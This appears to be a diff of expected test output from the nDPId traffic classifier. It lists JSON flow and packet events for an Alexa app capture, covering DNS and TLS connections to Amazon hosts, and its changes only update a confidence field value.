-01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976150029,"flow_last_seen":1490976150196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976150196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976150029,"flow_last_seen":1490976150127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976150127,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976150029,"flow_last_seen":1490976150196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976150196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976158680,"flow_last_seen":1490976158680,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976158680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1490976158680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976158680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8\/ohAAEAGSGasECrYNF7ohrK3Abt2joLDAAAAAKAC\/\/8pLAAAAgQFtAQCCAoA9nxLAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2532,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1490976158840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976158840,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwc8dAAOcGLDM0XuiGrBAq2AG7sreYM6oZdo6CxHASH\/6AKwAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2533,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1490976158841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976158841,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo\/olAAEAGSHmsECrYNF7ohrK3Abt2joLEmDOqGlAQAVfKnAAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2534,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976158680,"flow_last_seen":1490976158842,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976158842,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2535,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976158680,"flow_last_seen":1490976159147,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976159147,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976031691,"flow_last_seen":1490976032855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2154,"flow_avg_l4_payload_len":215,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976035553,"flow_last_seen":1490976036358,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2534,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976158680,"flow_last_seen":1490976158842,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976158842,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2535,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976158680,"flow_last_seen":1490976159147,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976159147,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976031691,"flow_last_seen":1490976032855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2154,"flow_avg_l4_payload_len":215,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976035553,"flow_last_seen":1490976036358,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1490976164994,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976164994,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WmBAAEARM1WsECrYrBAqAfpJADUAKhd4KNkBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1490976165058,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976165058,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl5+FAAEARpaysECoBrBAq2AA1+kkAUQAZKNmBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAAsACwhwaXRhbmd1acASwC4AAQABAAAABgAENF7ohg=="} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976165058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976165058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976165062,"flow_last_seen":1490976165062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976165062,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1490976165062,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976165062,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZaZAAEAG4UisECrYNF7ohptGAbs\/AhtsAAAAAKAC\/\/\/dAQAAAgQFtAQCCAoA9n7KAAAAAAEDAwg="} 